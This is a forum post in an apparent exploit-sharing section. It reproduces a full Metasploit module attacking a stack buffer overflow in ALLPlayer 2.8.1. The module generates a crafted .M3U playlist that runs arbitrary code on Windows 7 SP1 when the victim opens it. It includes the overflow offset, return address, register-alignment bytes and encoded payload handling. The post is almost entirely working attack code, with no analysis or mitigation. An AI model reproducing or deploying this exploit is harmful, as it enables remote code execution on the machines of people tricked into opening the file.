Jump to content
sensi

ALLPlayer M3U Buffer Overflow

By sensi, in Exploituri

Recommended Posts

sensi Newbie

sensi

Posted
Posted 

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ALLPlayer M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        ALLPlayer 2.8.1, caused by a long string in a playlist entry.
        By persuading the victim to open a specially-crafted .M3U file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom',      # Vulnerability discovery
          'Mike Czumak',  # Original exploit
          'Gabor Seljan'  # Metasploit module
        ],
      'References'     =>
        [
          [ 'BID', '62926' ],
          [ 'BID', '63896' ],
          [ 'EDB', '28855' ],
          [ 'EDB', '29549' ],
          [ 'EDB', '29798' ],
          [ 'EDB', '32041' ],
          [ 'OSVDB', '98283' ],
          [ 'URL', 'http://www.allplayer.org/' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'DisableNops'    => true,
          'BadChars'       => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
          'Space'          => 3060,
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EAX'
            }
        },
      'Targets'        =>
        [
          [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
            {
              'Offset' => 301,
              'Ret'    => "\x50\x45",  # POP POP RET from ALLPlayer.exe
              'Nop'    => "\x6e"       # ADD BYTE PTR DS:[ESI],CH
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 09 2013',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
        ],
      self.class)

  end


  def exploit
    nop = target['Nop']

    sploit =  rand_text_alpha_upper(target['Offset'])
    sploit << "\x61\x50"      # POPAD
    sploit << target.ret
    sploit << "\x53"          # PUSH EBX
    sploit << nop
    sploit << "\x58"          # POP EAX
    sploit << nop
    sploit << "\x05\x14\x11"  # ADD EAX,0x11001400
    sploit << nop
    sploit << "\x2d\x13\x11"  # SUB EAX,0x11001300
    sploit << nop
    sploit << "\x50"          # PUSH EAX
    sploit << nop
    sploit << "\xc3"          # RET
    sploit << nop * 109
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(10000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("http://" + sploit)

  end
end

source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...